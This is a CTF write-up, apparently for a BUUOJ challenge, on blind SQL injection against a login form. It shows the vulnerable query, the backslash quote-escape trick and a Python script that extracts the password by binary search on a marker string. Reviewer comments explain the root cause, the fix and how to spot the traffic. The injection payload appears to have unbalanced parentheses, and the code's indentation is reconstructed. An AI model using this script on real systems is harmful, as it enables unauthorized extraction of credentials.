盲注
后台源码
select * from users where username='$_POST["username"]' and password='$_POST["password"]';
在前面的输入（username）末尾加一个反斜杠，可以转义后面的引号字符 '
select * from users where username='admin\' and password='or/**/length(database())>0#';
登录结果不同时页面回显也不同，可据此判断注入条件真假
脚本
import requests
import time
# Boolean-based blind extraction script for the login form described above.
# Root cause on the server side is the string-concatenated query shown in the
# writeup (`username='$_POST[...]'`); a parameterized / prepared statement removes
# the injection point entirely, and the backslash trick only works because the
# closing quote of the username literal can be escaped by user input.
# Detection angle: this produces a long run of POSTs to the same login endpoint,
# one per second, whose password field carries SQL fragments (`/**/`, `if(`,
# `ascii(`, `substr(`) — a pattern that stands out in request logs / WAF telemetry.
url = "http://e93a4c52-4dfd-4bb1-afc3-b9f20eea580e.node3.buuoj.cn/index.php"
# Marker string used as the oracle: its presence or absence in the response body
# is the only signal the search below reads.  Presumably it appears when the
# injected condition is true — confirm against the actual page behaviour.
anser = "BJD needs to be stronger"
flag = ""
# 'admin\\' is a single trailing backslash on the wire; it escapes the quote that
# closes the username literal, so the password value is parsed as part of the query.
data = {
'username':'admin\\',
'password':''
}
# NOTE(review): the original indentation was lost in extraction; the nesting below
# is reconstructed from the control-flow keywords (one `for` iteration per
# character position, a binary search over ASCII values inside it).  The placement
# of `print(flag)` inside the `for` loop is an assumption — it may have been after it.
for i in range(1,50):
    # Fixed one-second pacing between requests.
    time.sleep(1)
    # Search bounds cover the printable ASCII range (32..127).
    high = 127
    low = 32
    mid = (high+low)//2
    while high>low:
        # Condition under test: "is the i-th character of `password` greater than mid?"
        # `/**/` stands in for whitespace.  Kept byte-for-byte as the author wrote it.
        payload="or/**/if(ascii(substr(password,{},1)>{},1,0)".format(i,mid)
        data['password']=payload
        response = requests.post(url=url,data=data)
        # Marker present -> condition treated as true -> raise the lower bound;
        # otherwise lower the upper bound.
        if anser in response.text:
            low = mid+1
        else:
            high = mid
        mid = (high+low)//2
    # Loop exits with high == low; that value is taken as the character's code.
    flag += chr(mid)
    # Prints the partial result after every character (position assumed — see note above).
    print(flag)
